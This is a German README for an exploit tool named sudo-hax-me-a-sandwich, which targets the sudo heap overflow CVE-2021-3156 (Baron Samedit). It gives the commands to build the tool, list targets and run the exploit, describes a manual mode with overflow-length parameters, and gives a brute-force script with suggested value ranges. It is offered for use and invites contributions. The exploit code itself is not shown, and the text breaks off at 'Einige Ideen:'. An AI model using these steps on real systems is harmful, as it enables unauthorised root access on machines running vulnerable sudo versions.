
Dies ist ein Exploit für die Sicherheitslücke CVE-2021-3156 in sudo (von Qualys als Baron Samedit bezeichnet).
Bauen:
$ make
Ziele auflisten:
$ ./sudo-hax-me-a-sandwich
Ausführen:
$ ./sudo-hax-me-a-sandwich <target_number>
Manueller Modus:
$ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
Stelle sicher, dass du GNU parallel installiert hast.
$ make brute
$ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>
Einige Standardwerte zum Ausprobieren:
$ ./brute.sh 90 120 50 70 150 300
Verbraucht alle verfügbaren Kerne. Versuch nicht, nebenbei Netflix zu schauen und zu bruteforcen.
Sende (vernünftige) PRs, möglicherweise merge ich sie.
Einige Ideen: